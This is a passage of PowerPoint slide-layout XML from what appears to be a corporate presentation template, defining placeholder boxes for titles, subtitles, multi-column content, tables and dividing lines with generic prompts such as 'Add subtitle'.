            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="2008094"/>
            <a:ext cx="5328591" cy="4121243"/>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GB"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8" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB985924-B690-4F6B-A059-A56784949324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="2008094"/>
            <a:ext cx="5328591" cy="4121243"/>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GB"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022713" y="1628775"/>
            <a:ext cx="0" cy="4500562"/>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FC0690AA-22AB-43BE-82E3-4352A408EF06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628775"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29321681-CA4A-4D99-BB69-D603568A6CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1628775"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63652987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ubtitle &amp; 3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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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9" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51856C50-B020-4008-B65A-11A3AB5CAC31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267793" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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10" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA9709D-8056-4926-A2FF-317C8EA457A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176811" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395653765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ubtitle text &amp;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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>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GB"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6" name="Table Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801FAED1-3BDC-4517-B5E4-D412EC0FFF2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4178300" y="1628775"/>
            <a:ext cx="7518400" cy="4500563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384410199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ubtitle &amp;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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Table Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801FAED1-3BDC-4517-B5E4-D412EC0FFF2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1628775"/>
            <a:ext cx="11337926" cy="4500563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140395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elcome on white">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428CF-B158-4BBE-BBB6-25EEAEE04240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1022790"/>
            <a:ext cx="8647689" cy="4812420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5E02CB-C8D8-4B09-9213-EAFF4F051606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[Add company classification and regulatory details] </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211608065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ubtitle &amp; 3 content with dividing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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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9" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51856C50-B020-4008-B65A-11A3AB5CAC31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267793" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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10" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA9709D-8056-4926-A2FF-317C8EA457A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176811" y="1628773"/>
            <a:ext cx="3519888" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9828F758-21A2-4FD1-860C-ECD2B79A8453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4073229" y="1628775"/>
            <a:ext cx="0" cy="4500562"/>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1EDE509-68AA-40B1-9F83-E6D6304470E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7982246" y="1628775"/>
